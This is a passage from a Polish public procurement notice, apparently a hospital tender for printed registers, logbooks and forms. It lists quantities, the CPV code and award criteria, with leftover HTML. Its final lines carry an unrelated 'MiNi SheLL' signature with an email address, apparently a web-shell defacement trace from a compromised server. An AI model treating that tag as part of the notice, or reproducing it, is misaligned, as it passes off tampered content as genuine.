format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	15
15	Książka Pracowni Analitycznych
format  2/3 A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	12
16	Dziennik Kancelaryjny
format A4, ilość stron 200 (100 kartek), oprawa twarda, szycie zeszytowe płaskie 	szt	90
17	Książka Ewidencji Wyjść
format A4, ilość stron 200 (100 kartek), oprawa twarda, szycie zeszytowe płaskie szt	1
18 Książka Raportów Centralnej Sterylizacji
format A4, ilość stron 200 (100 kartek), oprawa twarda, szycie zeszytowe płaskie	szt	5
19	 Paszport Techniczny
Format A5, ilość stron 36 (18 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	140
20	Książka Główna Przychodni
format  A4, 200 stron(100 kartek)	szt	12
21	Pocztowa Książka Nadawcza
2/3 A4, 200 stron (100 kartek), oprawa miękka, szycie zeszytowe płaskie, samokopia	szt	25
22	Arkusz Spisu z natury
format  A4, 80 kartek, samokopiujące 1+1	uniwersalny	szt	15
23	Druki RW 
format A5, 80 kartek, wielokopia	szt	70
24	Druki RW A5
format 1/3 A4, 80 kartek, wielokopia szt	130
25	 Skorowidz do Księgi Głównej
format 28x16 cm pionowo, 200 stron (100 kartek), oprawa twarda, szycie zeszytowe płaskie	szt	12
26	Wniosek o zaliczkę
format 1/2 A5, 100 kartek szt	10
27	Rozliczenie zaliczki
format 1/2 A5, 100 kartek szt	10
28 	Książka Zgłoszonych Robót
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	5
29 	Książka Wyjazdowa
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	2
30	Książka Kontroli Środków Odurzających i Substancji Psychotropowych
format A4, ilość stron ponumerowanych z otworami umożliwiającymi przesznurowanie 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	30
31	 Książka Transfuzyjna
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	12
32 	Książka Rejestrowa Badań Bakteriologicznych z Bloku Operacyjnego
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	3
33 	Książka Rejestrowa Badań z Bloku Operacyjnego
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	3
34	 Książka Badań Pracownia Audiologiczna Zespołu Poradni Specjalistycznych
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	8
35	Książka Zleceń Badań Kontrastowych
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	6
36	Książka Badań EEG
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	4
37	Książka Badań EMG
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	2
38	Książka Dokonanych Operacji
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	40
39	Dowód wypłaty KW 
Bloczek, o objętości 80 kartek, drukowany na papierze samokopiującym; format A6	uniwersalny	szt	8
40	Wniosek o udzielenie pożyczki
Bloczek o objętości 100 kartek, dwustronnie różny, drukowany na papierze offsetowym o gramaturze 70g/m2 , format A5 szt	3
41	Karta Pracy Wyjazdowego Zespołu Sanitarnego Typu N
Bloczek,format  A4, 80 kartek, samokopiujące 1+1	szt	20
42	Recepty bloczki numerowane z kodem kreskowym a 100 kartek 	szt	430
43	Karta Obserwacji i Zleceń, format 100cm x 29,7 cm, papier offset 80g, 4/4 szt	4400
44	Roczna karta ewidencji czasu pracy format
format A5, karton, dwustronny A5 OS-227 szt	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com